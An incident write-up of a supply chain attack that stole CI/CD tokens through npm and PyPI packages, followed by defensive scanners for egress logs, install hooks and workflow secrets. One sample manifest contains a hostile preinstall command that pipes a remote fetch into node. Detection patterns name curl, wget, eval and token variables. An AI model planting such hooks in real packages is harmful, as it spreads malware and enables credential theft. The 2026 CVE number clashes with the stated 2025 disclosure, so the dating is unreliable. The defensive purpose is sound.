
TanStack Supply Chain Attack: CVE-2026-45321

What Happened

Between late 2024 and early 2025, threat actor TeamPCP executed a supply chain attack that compromised over 170 npm and PyPI packages with more than 518 million downloads. The attack, assigned CVE-2026-45321 with a CVSS score of 9.6, targeted prominent projects including TanStack, Mistral AI, and Guardrails AI.

TeamPCP focused on stealing credentials from CI/CD pipelines rather than injecting malicious code directly into libraries. The malicious packages executed during installation and build processes, exfiltrating GitHub tokens, npm tokens, and environment variables. With these credentials, attackers published new malicious versions of legitimate packages through compromised accounts.

The attack's sophistication lies in its propagation model: automating credential theft to gain persistent publishing access across multiple ecosystems.

Timeline

Initial Compromise (Late 2024): TeamPCP began distributing malicious packages designed to execute during npm install and build phases, targeting developer workstations and CI/CD runners.

Credential Exfiltration (Late 2024 - Early 2025): Malicious code harvested GitHub Actions tokens, npm publishing credentials, and PyPI tokens from environment variables during automated builds.

Lateral Movement (Early 2025): Using stolen credentials, attackers published malicious versions of legitimate packages, including those maintained by TanStack and other high-profile projects.

Detection and Disclosure (Early 2025): Security researchers identified the campaign and assigned CVE-2026-45321. Affected maintainers began rotating credentials and publishing clean package versions.

Which Controls Failed or Were Missing

Secrets Management in CI/CD: GitHub Actions workflows exposed publishing tokens as environment variables accessible to arbitrary code during build and install phases. The workflows lacked isolation between untrusted dependency code and sensitive credentials.

Dependency Integrity Verification: Build processes executed code from newly installed dependencies without runtime behavioral monitoring. There was no mechanism to detect outbound network connections during package installation.

Least Privilege for Publishing Tokens: npm and PyPI publishing tokens granted broad, long-lived access to publish any version of any package the account maintained. The tokens weren't scoped to specific packages or time windows.

Behavioral Anomaly Detection: No monitoring flagged unusual network activity during npm install or pip install operations. Outbound connections to attacker-controlled endpoints went undetected.

Supply Chain Verification: Automated dependency updates didn't validate package behavior before merging. There was no pre-publication review of dependency changes.

What the Relevant Standards Require

NIST 800-53 Rev 5 SA-10 (Developer Configuration Management): Requires protecting the integrity of changes to the system and implementing configuration management for organizational systems. The compromised CI/CD workflows violated this by allowing untrusted code execution with access to publishing credentials.

NIST 800-53 Rev 5 SR-3 (Supply Chain Controls and Processes): Mandates processes to identify and address weaknesses or deficiencies in the supply chain. The lack of behavioral monitoring during dependency installation represents a gap in supply chain visibility.

ISO/IEC 27001:2022 Annex A.8.31 (Separation of Development, Testing and Production Environments): Requires separation between environments to reduce unauthorized access risks. CI/CD pipelines that expose production publishing credentials to development-time dependency code violate this separation.

PCI DSS v4.0.1 Requirement 6.3.2: States that security of bespoke and custom software and components developed by or for the entity is managed throughout the software development lifecycle. The attack exploited the gap between dependency acquisition and production deployment.

SOC 2 CC6.6 (Logical and Physical Access Controls): Requires restricting logical access to information assets. Long-lived, broadly scoped publishing tokens fail this requirement by not implementing time-based or scope-based restrictions.

Lessons and Action Items for Your Team

Isolate secrets from dependency execution. Move publishing tokens out of the build environment. Use OpenID Connect (OIDC) federation with npm and PyPI instead of long-lived tokens. Configure GitHub Actions to authenticate directly to package registries using workload identity, eliminating the need for stored credentials.

Implement runtime behavioral monitoring. Deploy tools that detect network connections during npm install, pip install, and build phases. Flag any outbound connections to unexpected domains. Consider using isolated build environments (containers or VMs) with network egress logging.
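As an added example (not tooling from the page or the affected projects), here is the egress check a build container's proxy log can be run through after an install step: the log format, the allowlist of registry hosts and the sample lines are all constructed assumptions, with an RFC 5737 documentation address standing in for an attacker-controlled endpoint.

```python
import re

# Constructed sample: egress log lines as a CONNECT-logging proxy in front of an
# isolated build container might emit them (not a real capture). The third line
# goes to an RFC 5737 documentation address standing in for an attacker host.
SAMPLE_EGRESS_LOG = """\
2025-01-15T10:22:01Z npm-install CONNECT registry.npmjs.org:443
2025-01-15T10:22:03Z npm-install CONNECT github.com:443
2025-01-15T10:22:07Z npm-install CONNECT 198.51.100.23:443
2025-01-15T10:22:09Z pip-install CONNECT files.pythonhosted.org:443
2025-01-15T10:22:11Z pip-install CONNECT pypi.org:443
2025-01-15T10:22:12Z build CONNECT paste.example.invalid:80
"""

# Hosts an install step legitimately needs (assumed allowlist); anything else is flagged.
DEFAULT_ALLOWLIST = {
    "registry.npmjs.org", "registry.yarnpkg.com",
    "pypi.org", "files.pythonhosted.org",
    "github.com", "objects.githubusercontent.com",
}

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<phase>\S+) CONNECT (?P<host>[^:\s]+):(?P<port>\d+)$"
)
IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

def flag_unexpected_egress(log_text, allowlist=DEFAULT_ALLOWLIST):
    """Return (phase, host, port, reason) for every connection not on the allowlist.
    Raw IP destinations are called out separately: registries are reached by
    hostname, so a bare IP during dependency install is a strong anomaly signal."""
    findings = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # unknown line shape; a production tool would count these too
        host, port, phase = m["host"].lower(), int(m["port"]), m["phase"]
        if host in allowlist:
            continue
        if IPV4_RE.match(host):
            reason = "raw IP destination during dependency install"
        elif port != 443:
            reason = f"non-TLS port {port} to unlisted host"
        else:
            reason = "unlisted host"
        findings.append((phase, host, port, reason))
    return findings
```

A non-empty result should fail the pipeline step, not just log, so that a compromised dependency cannot reach the exfiltration endpoint and still ship.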

Scope publishing credentials. Use granular automation tokens that restrict publishing to specific packages. Set short expiration windows (hours, not months). Rotate tokens after each release if your registry supports it.

Add pre-publication gates. Before merging dependency updates, run them in an isolated environment with network monitoring. Review dependency diffs for suspicious post-install scripts. Use tools like npm audit signatures to verify publisher identity.
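The lifecycle-script review mentioned above, as an added example rather than code from the page or any named tool: it walks the package.json files of freshly installed dependencies and queues any preinstall/install/postinstall hook that reaches the network, evaluates dynamic code, decodes encoded content, or reads token-like environment variables. The two manifests and the indicator list are constructed assumptions.

```python
import json
import re

# Constructed sample manifests (not real packages): one benign native build
# hook, one that fetches and executes remote content during install.
SAMPLE_MANIFESTS = {
    "node_modules/left-widget/package.json": json.dumps({
        "name": "left-widget", "version": "2.1.0",
        "scripts": {"postinstall": "node scripts/build-native.js"},
    }),
    "node_modules/color-utils/package.json": json.dumps({
        "name": "color-utils", "version": "1.4.2",
        "scripts": {"preinstall": "curl -s https://cdn.example.invalid/x | node -"},
    }),
}

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicators that an install hook reaches the network, evaluates dynamic code,
# decodes payloads, or reads the build environment. None is proof on its own;
# together they justify a manual review before the dependency update merges.
INDICATORS = {
    "network": re.compile(r"\b(curl|wget|fetch|https?://)", re.I),
    "dynamic-eval": re.compile(r"\b(node -e|node -|eval\b|Function\()", re.I),
    "encoding": re.compile(r"\b(base64|atob|Buffer\.from)\b", re.I),
    "env-access": re.compile(r"(\$\{?\w*(TOKEN|SECRET|KEY)\w*\}?|process\.env)", re.I),
}

def review_lifecycle_scripts(manifests):
    """Return {package: {hook: [indicator, ...]}} for hooks worth a human look.
    Hooks with no indicator hits are omitted so the output is a review queue."""
    queue = {}
    for path, text in manifests.items():
        pkg = json.loads(text)
        scripts = pkg.get("scripts") or {}
        for hook in LIFECYCLE_HOOKS:
            cmd = scripts.get(hook)
            if not cmd:
                continue
            hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
            if hits:
                queue.setdefault(pkg["name"], {})[hook] = hits
    return queue
```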

Monitor package behavior changes. Track when dependencies add new network calls, file system access, or process execution. Tools like Socket Security or Phylum can detect behavioral changes between versions.

Separate build and publish workflows. Don't grant the same pipeline both the ability to install arbitrary dependencies and publish to production registries. Use a two-stage process: build in an untrusted environment, then transfer artifacts to a trusted publishing environment.

Audit your GitHub Actions workflows. Review every workflow file for environment variables containing tokens. Search for secrets.NPM_TOKEN, secrets.PYPI_TOKEN, or similar patterns. Replace them with OIDC authentication.
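As an added example covering the OIDC migration, the build/publish split and this workflow audit (not a script from the page or the affected projects), the scanner below reads a GitHub Actions workflow job by job and reports any job that both installs dependencies and holds a secrets.*TOKEN-style credential, or that holds such a credential without an id-token: write permission. The embedded workflow is constructed: its release job shows the exposure pattern, its publish job the OIDC form; the two-space job indentation and the secret-name pattern are assumptions of this scanner, not a full YAML parse.

```python
import re

# Constructed sample workflow (not a real project's file): "release" installs
# dependencies while holding a long-lived npm token; "publish" uses OIDC instead.
SAMPLE_WORKFLOW = """\
jobs:
  release:
    runs-on: ubuntu-latest
    env:
      NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
    steps:
      - run: npm ci
      - run: npm publish
  publish:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
    steps:
      - uses: actions/download-artifact@v4
      - run: npm publish --provenance
"""

JOB_RE = re.compile(r"^  ([A-Za-z_][\w-]*):\s*$")  # job names sit two spaces under jobs:
SECRET_RE = re.compile(r"secrets\.\w*(TOKEN|SECRET|PASSWORD|KEY)\w*", re.I)
INSTALL_RE = re.compile(r"\b(npm (ci|install|i)|yarn( install)?|pnpm (install|i)|pip install|poetry install)\b")
OIDC_RE = re.compile(r"^\s*id-token:\s*write\s*$")

def audit_workflow(text):
    # Returns {job_name: [finding, ...]} for jobs that expose registry credentials.
    jobs, current, in_jobs = {}, None, False
    for line in text.splitlines():
        in_jobs = in_jobs or line.startswith("jobs:")
        m = JOB_RE.match(line) if in_jobs else None
        if m:
            current = m.group(1)
            jobs[current] = {"secrets": set(), "installs": False, "oidc": False}
        elif current:
            j = jobs[current]
            j["secrets"].update(s.group(0) for s in SECRET_RE.finditer(line))
            j["installs"] |= bool(INSTALL_RE.search(line))
            j["oidc"] |= bool(OIDC_RE.match(line))
    findings = {}
    for name, j in jobs.items():
        out = []
        if j["secrets"] and j["installs"]:
            out.append(f"{', '.join(sorted(j['secrets']))} visible to dependency install scripts")
        if j["secrets"] and not j["oidc"]:
            out.append("long-lived registry token; migrate to OIDC trusted publishing")
        if out:
            findings[name] = out
    return findings
```

Run it over every file under .github/workflows/ and treat any job in the result as a release blocker until its token is removed or the job is split as described above.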

The TanStack compromise demonstrates that supply chain attacks have evolved beyond simple package tampering. Your CI/CD infrastructure is now the target. Address credential exposure in your build pipelines before an attacker does it for you.
